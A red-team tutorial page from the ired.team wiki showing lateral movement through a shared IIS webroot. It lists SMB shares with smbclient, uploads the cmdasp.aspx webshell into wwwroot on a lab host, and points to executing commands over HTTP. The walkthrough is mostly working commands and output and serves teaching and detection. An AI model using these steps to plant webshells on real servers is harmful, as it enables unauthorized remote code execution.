Red Teaming Experiments
linkedintwitterpatreongithub
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
WinRM for Lateral Movement
WinRS for Lateral Movement
WMI for Lateral Movement
RDP Hijacking for Lateral Movement with tscon
Shared Webroot
Lateral Movement via DCOM
WMI + MSI Lateral Movement
Lateral Movement via Service Configuration Manager
Lateral Movement via SMB Relaying
WMI + NewScheduledTaskAction Lateral Movement
WMI + PowerShell Desired State Configuration Lateral Movement
Simple TCP Relaying with NetCat
Empire Shells with NetNLTMv2 Relaying
Lateral Movement with Psexec
From Beacon to Interactive RDP Session
SSH Tunnelling / Port Forwarding
Lateral Movement via WMI Event Subscription
Lateral Movement via DLL Hijacking
Lateral Movement over headless RDP with SharpRDP
Man-in-the-Browser via Chrome Extension
ShadowMove: Lateral Movement by Duplicating Existing Sockets
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Shared Webroot
Lateral Movement

Enumerating victim host 10.0.0.6 for any shares:
[email protected]
smbclient -L //10.0.0.6 -U spot
​
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password:
​
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
temp Disk
tools Disk
transcripts Disk
wwwroot Disk
Logging in to the wwwroot share:
[email protected]
smbclient //10.0.0.6/wwwroot -U spot
​
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 25 16:57:52 2018
.. D 0 Sat Aug 25 16:57:52 2018
aspnet_client D 0 Tue Jul 31 20:11:20 2018
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
Uploading a webshell into the wwwroot:
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx
​
putting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
smb: \> ls
. D 0 Sat Aug 25 16:59:47 2018
.. D 0 Sat Aug 25 16:59:47 2018
aspnet_client D 0 Tue Jul 31 20:11:20 2018
c.aspx A 1400 Sat Aug 25 16:59:47 2018
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
​
6463487 blocks of size 4096. 3032260 blocks available
Same as above in a picture:
Attacker can now access the newly uploaded webshell via http://10.0.0.6/c.aspx and start executing commands:

See T1108: Webshells for observations:

https://attack.mitre.org/wiki/Technique/T1051
attack.mitre.org
Previous
RDP Hijacking for Lateral Movement with tscon
Next
Lateral Movement via DCOM
Last modified 3yr ago
Copy link
On this page
Execution
Observations
References